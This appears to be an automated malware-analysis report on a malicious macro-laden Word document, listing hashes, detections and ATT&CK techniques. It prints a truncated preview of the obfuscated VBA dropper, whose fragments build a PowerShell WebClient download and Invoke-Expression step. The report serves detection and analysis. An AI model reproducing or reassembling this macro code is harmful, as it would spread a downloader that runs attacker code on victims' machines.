Office (OLE) malware analysis — malicious · dcab1d68887140ae

MALICIOUS

Office (OLE)

259.5 KB Created: 2017-12-30 00:37:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: 7b742e0d531cd781106ec4ac07fd7008 SHA-1: abffdd952d9187d1fb368f0fa5781ba77f498898 SHA-256: dcab1d68887140ae7597993d166babeb0792f12ef9388e5cab89e9f4ee4b329f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. This, combined with the AutoOpen macro marker and the ClamAV detection signature 'Img.Dropper.PhishingLure-6443153-0', strongly suggests the document is designed to execute a malicious payload. The VBA script itself appears heavily obfuscated, but the presence of Shell() and the overall heuristic profile point to a downloader or dropper functionality.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 87635 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	87635 bytes
SHA-256: `c3651e49ea53d0a83b9ce2dfe9c5fcc63b427c79020f3554bb0c262f1a877b11`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "KknfzPAbZ" Function rKvQSkUaumI() On Error Resume Next AnbvFwEwq = (JCzdYQi - Rnd(43 * Tan(aAAKPUEzqtK)) / jNCswXkiEz * Oct(hwRsLzLturZa) * RBtdaAftcvVvA / Oct(hBjzWbP - Chr(250) + 581 - ChrB(LzcswizPi)) - 389 + mNbudHHE) aGOhRADV = (bFHhjUOLGzwZCK - Rnd(43 * Tan(WVdoLZJIbVKViw)) / nouUzvBwI * Oct(pXuJlDzviv) * VdlWSwjLVz / Oct(OsKHfiNDVXUT - Chr(250) + 581 - ChrB(BOwpSLZABp)) - 389 + LIziwVmmV) XPUWRsVBMEQ = (GiSuwSz) + Mid("dmY0GnS07qM07q+07qui+MuiraMui+Mu'+'ibc.07q+07qTM'+'07q+07qui+MuioStr07q+07qing(), aMui+MuiNrhuMui+MuiaMui+Mu'+'isMui+Mui);IMui+MuinvoMui+Muike-IMui+McfppQs87HbB6prJB", 8, 142) SJrDZY = (rFCwwLtisN - Rnd(43 * Tan(CzYwpvBiCBtMN)) / IminXZsS * Oct(XOJBfjEz) * BqHnpdFi / Oct(ZBSwspl - Chr(250) + 581 - ChrB(ZOrVozkrAjjtV)) - 389 + wBmKWCV) DndsajzjB = (Vcfvdzo - Rnd(43 * Tan(TUAEENcjLYA)) / GZzPAFzNDM * Oct(fMfRcNYbC) * KRldIVwVXEHsa / Oct(wiQvXzbZGGVsYw - Chr(250) + 581 - ChrB(TmwziwH)) - 389 + lsjBrfIG) pLizzwUO = (lNqXwotY - Rnd(43 * Tan(kXCQLhTjScNIh)) / jTCbOMdduI * Oct(BzffZIIJzivOY) * oAjZiczEs / Oct(DtNfMKGc - Chr(250) + 581 - ChrB(YJknEtTEzhmkFi)) - 389 + ZMzDPfsz) oIoBL = (BioTTQpZVTPsHp) + Mid("DT5GbPni+Muinc = Mui'+'+MuinMu07q+07qi+Muiew-Mui+MuiobMui+MuijMui+MuieMui+Muict System.Net.Mui+MuiWeMui+MuibClMui+Muiient;aNMui+MuirnMui+Muis07q+07qadaMui+MuisMuWmnCjd9", 8, 154) vfnSOjiZZC = (mhUzwdDFQkLi - Rnd(43 * Tan(PzCVERLu)) / CpSiCowjtwziGr * Oct(CWJssNLwhdc) * wWbqvrpiffRa / Oct(IhrMiZJFa - Chr(250) + 581 - ChrB(hISCiqtkB)) - 389 + BzNRIErQMwX) ELcLJNz = (iPXpWkDr - Rnd(43 * Tan(fpoSbodSMcPowI)) / KKIGwMIAhNkEQ * Oct(EJllfZn) * PDOczcCnSmGiiL / Oct(zvnWoHErjMR - Chr(250) + 581 - ChrB(SdCQjARv)) - 389 + rTNfwtv) TcSzLLG = (SjYDuhc - Rnd(43 * Tan(HoluPANLTZEZi)) / tdvcZpSCWKhwHV * Oct(KXacCIYKco) * OXMticVZnuHR / Oct(mWFRbNRt - Chr(250) + 581 - ChrB(nJCizjkUTTnqa)) - 389 + pdfEdiiiCGRpfD) MfFOzBAWEla = (jcjjTjC) + Mid("Lj7OuAmwPW6Yf109+[07q+07qcHAR'+']'+'68),[cHA'+'R]39 -ReplAce ([cHAR]57+[cHAR]72+[cHAR]111),[c07q+07qHAR]92) amU&( WxQVERBOSe'+'pR'+'eferenCe.ToS07q+07qt07q+07q'+'Ring()'+'[1,3]+MuiXMui-JoinM07q7ZB", 14, 180) RZdHsiqp = (zhWthoqsDzmLMf - Rnd(43 * Tan(iVjKPWXiN)) / WGcZqpOJt * Oct(iuOlpMXjBfjt) * DiKOjfaa / Oct(JcLhNSMJYCStln - Chr(250) + 581 - ChrB(wUDzqjij)) - 389 + uYvjbfiTLfl) lcQvoUZnhOi = (MpZqvPuTNdL - Rnd(43 * Tan(iKsLIbNjm)) / nVdSwCKKdScz * Oct(HGVmDJDPsvsLh) * VjSAArbCEMdSs / Oct(CAtliXkF - Chr(250) + 581 - ChrB(oJajVuZlGPOp)) - 389 + LRcHLFBJJlR) tQLjGIkOd = (QOcbjSb - Rnd(43 * Tan(inpXjitYziGCVY)) / EuXobzBb * Oct(EcLQBsbM) * prUJjnJO / Oct(ckLoirCX - Chr(250) + 581 - ChrB(MiAzjMiTDWc)) - 389 + HHtrjjruNj) rpnTjjSjuH = (ZHwETrHhbSRq) + Mid("LwNA3RKzME[3,11'+',2]-JOiN07q07q) ((07q ((07q+07qMuiaNr07q+07qfMui+MuiraMuTKcDhTuXuGYkEZGA6b2rSRhtz9", 9, 66) rtwpSoGR = (NsCGdKCQzdrZIG - Rnd(43 * Tan(fbWDdSbp)) / JbMfDdfYJoI * Oct(XidFLZd) * aDzEzWhmhnbl / Oct(bzBzXMU - Chr(250) + 581 - ChrB(TQTwEIwtwStzHA)) - 389 + cHhhvsq) hwXCkbmP = (RnYOJbihnSXbzV - Rnd(43 * Tan(WJzvlpKzJS)) / EwcTzFTB * Oct(biGjBKRDGswidh) * DbckKGpOww / Oct(lFTVSIvZun - Chr(250) + 581 - ChrB(PtaXHrQ)) - 389 + caPDPVdir) ZKEmjTutr = (HmfGtOltjVio - Rnd(43 * Tan(arZqpfYFcuGbEM)) / SrijoYtTw * Oct(oSKzHAd) * EVqBQwhkdfsY / Oct(oBWasrCAXhX - Chr(250) + 581 - ChrB(pBMOGVtctzr)) - 389 + QafwDuNaXW) rnPZFS = (MWAvhbHoNJ) + Mid("KzjoB5JBUO(4mD,4mMui+MuiDMui+Mui);Mui+07q+07qMuiaNrkMui+M'+'u'+'iarapMui+M07q+07quiaMu'+'i+Muis = Mui+MuiaNM07q+07qui+MuirMui+Muinsadasd.nMui+Muiext(1Mui+Mui,Mui+Mu07qjvNbCBsi", 11, 157) YjBCNiA = (lUJliZMjkaqnD - Rnd(43 * Tan(kAMiJmwwzdWw)) / BDzoZDkJTt * Oct(PBKXGqcoXcS) * JvYFqnXjP / Oct(DKfllQkTdRGi - Chr(250) + 581 - ChrB(IbbrGAhZt)) - 389 + oqtAztWwNOhz) zMwavXIA = (ZiSwASoc - Rnd(43 * Tan(ajpujQziJqBV)) / jAziWAsvKqt * Oct(BAzzhXYIcw) * tBGbMJuMQl / Oct(vSAVvnkp ... (truncated)

SHA-256: c3651e49ea53d0a83b9ce2dfe9c5fcc63b427c79020f3554bb0c262f1a877b11

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KknfzPAbZ"
Function rKvQSkUaumI()
On Error Resume Next
AnbvFwEwq = (JCzdYQi - Rnd(43 * Tan(aAAKPUEzqtK)) / jNCswXkiEz * Oct(hwRsLzLturZa) * RBtdaAftcvVvA / Oct(hBjzWbP - Chr(250) + 581 - ChrB(LzcswizPi)) - 389 + mNbudHHE)
aGOhRADV = (bFHhjUOLGzwZCK - Rnd(43 * Tan(WVdoLZJIbVKViw)) / nouUzvBwI * Oct(pXuJlDzviv) * VdlWSwjLVz / Oct(OsKHfiNDVXUT - Chr(250) + 581 - ChrB(BOwpSLZABp)) - 389 + LIziwVmmV)
XPUWRsVBMEQ = (GiSuwSz) + Mid("dmY0GnS07qM07q+07qui+MuiraMui+Mu'+'ibc.07q+07qTM'+'07q+07qui+MuioStr07q+07qing(), aMui+MuiNrhuMui+MuiaMui+Mu'+'isMui+Mui);IMui+MuinvoMui+Muike-IMui+McfppQs87HbB6prJB", 8, 142)
SJrDZY = (rFCwwLtisN - Rnd(43 * Tan(CzYwpvBiCBtMN)) / IminXZsS * Oct(XOJBfjEz) * BqHnpdFi / Oct(ZBSwspl - Chr(250) + 581 - ChrB(ZOrVozkrAjjtV)) - 389 + wBmKWCV)
DndsajzjB = (Vcfvdzo - Rnd(43 * Tan(TUAEENcjLYA)) / GZzPAFzNDM * Oct(fMfRcNYbC) * KRldIVwVXEHsa / Oct(wiQvXzbZGGVsYw - Chr(250) + 581 - ChrB(TmwziwH)) - 389 + lsjBrfIG)
pLizzwUO = (lNqXwotY - Rnd(43 * Tan(kXCQLhTjScNIh)) / jTCbOMdduI * Oct(BzffZIIJzivOY) * oAjZiczEs / Oct(DtNfMKGc - Chr(250) + 581 - ChrB(YJknEtTEzhmkFi)) - 389 + ZMzDPfsz)
oIoBL = (BioTTQpZVTPsHp) + Mid("DT5GbPni+Muinc = Mui'+'+MuinMu07q+07qi+Muiew-Mui+MuiobMui+MuijMui+MuieMui+Muict System.Net.Mui+MuiWeMui+MuibClMui+Muiient;aNMui+MuirnMui+Muis07q+07qadaMui+MuisMuWmnCjd9", 8, 154)
vfnSOjiZZC = (mhUzwdDFQkLi - Rnd(43 * Tan(PzCVERLu)) / CpSiCowjtwziGr * Oct(CWJssNLwhdc) * wWbqvrpiffRa / Oct(IhrMiZJFa - Chr(250) + 581 - ChrB(hISCiqtkB)) - 389 + BzNRIErQMwX)
ELcLJNz = (iPXpWkDr - Rnd(43 * Tan(fpoSbodSMcPowI)) / KKIGwMIAhNkEQ * Oct(EJllfZn) * PDOczcCnSmGiiL / Oct(zvnWoHErjMR - Chr(250) + 581 - ChrB(SdCQjARv)) - 389 + rTNfwtv)
TcSzLLG = (SjYDuhc - Rnd(43 * Tan(HoluPANLTZEZi)) / tdvcZpSCWKhwHV * Oct(KXacCIYKco) * OXMticVZnuHR / Oct(mWFRbNRt - Chr(250) + 581 - ChrB(nJCizjkUTTnqa)) - 389 + pdfEdiiiCGRpfD)
MfFOzBAWEla = (jcjjTjC) + Mid("Lj7OuAmwPW6Yf109+[07q+07qcHAR'+']'+'68),[cHA'+'R]39 -ReplAce ([cHAR]57+[cHAR]72+[cHAR]111),[c07q+07qHAR]92) amU&( WxQVERBOSe'+'pR'+'eferenCe.ToS07q+07qt07q+07q'+'Ring()'+'[1,3]+MuiXMui-JoinM07q7ZB", 14, 180)
RZdHsiqp = (zhWthoqsDzmLMf - Rnd(43 * Tan(iVjKPWXiN)) / WGcZqpOJt * Oct(iuOlpMXjBfjt) * DiKOjfaa / Oct(JcLhNSMJYCStln - Chr(250) + 581 - ChrB(wUDzqjij)) - 389 + uYvjbfiTLfl)
lcQvoUZnhOi = (MpZqvPuTNdL - Rnd(43 * Tan(iKsLIbNjm)) / nVdSwCKKdScz * Oct(HGVmDJDPsvsLh) * VjSAArbCEMdSs / Oct(CAtliXkF - Chr(250) + 581 - ChrB(oJajVuZlGPOp)) - 389 + LRcHLFBJJlR)
tQLjGIkOd = (QOcbjSb - Rnd(43 * Tan(inpXjitYziGCVY)) / EuXobzBb * Oct(EcLQBsbM) * prUJjnJO / Oct(ckLoirCX - Chr(250) + 581 - ChrB(MiAzjMiTDWc)) - 389 + HHtrjjruNj)
rpnTjjSjuH = (ZHwETrHhbSRq) + Mid("LwNA3RKzME[3,11'+',2]-JOiN07q07q) ((07q ((07q+07qMuiaNr07q+07qfMui+MuiraMuTKcDhTuXuGYkEZGA6b2rSRhtz9", 9, 66)
rtwpSoGR = (NsCGdKCQzdrZIG - Rnd(43 * Tan(fbWDdSbp)) / JbMfDdfYJoI * Oct(XidFLZd) * aDzEzWhmhnbl / Oct(bzBzXMU - Chr(250) + 581 - ChrB(TQTwEIwtwStzHA)) - 389 + cHhhvsq)
hwXCkbmP = (RnYOJbihnSXbzV - Rnd(43 * Tan(WJzvlpKzJS)) / EwcTzFTB * Oct(biGjBKRDGswidh) * DbckKGpOww / Oct(lFTVSIvZun - Chr(250) + 581 - ChrB(PtaXHrQ)) - 389 + caPDPVdir)
ZKEmjTutr = (HmfGtOltjVio - Rnd(43 * Tan(arZqpfYFcuGbEM)) / SrijoYtTw * Oct(oSKzHAd) * EVqBQwhkdfsY / Oct(oBWasrCAXhX - Chr(250) + 581 - ChrB(pBMOGVtctzr)) - 389 + QafwDuNaXW)
rnPZFS = (MWAvhbHoNJ) + Mid("KzjoB5JBUO(4mD,4mMui+MuiDMui+Mui);Mui+07q+07qMuiaNrkMui+M'+'u'+'iarapMui+M07q+07quiaMu'+'i+Muis = Mui+MuiaNM07q+07qui+MuirMui+Muinsadasd.nMui+Muiext(1Mui+Mui,Mui+Mu07qjvNbCBsi", 11, 157)
YjBCNiA = (lUJliZMjkaqnD - Rnd(43 * Tan(kAMiJmwwzdWw)) / BDzoZDkJTt * Oct(PBKXGqcoXcS) * JvYFqnXjP / Oct(DKfllQkTdRGi - Chr(250) + 581 - ChrB(IbbrGAhZt)) - 389 + oqtAztWwNOhz)
zMwavXIA = (ZiSwASoc - Rnd(43 * Tan(ajpujQziJqBV)) / jAziWAsvKqt * Oct(BAzzhXYIcw) * tBGbMJuMQl / Oct(vSAVvnkp
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.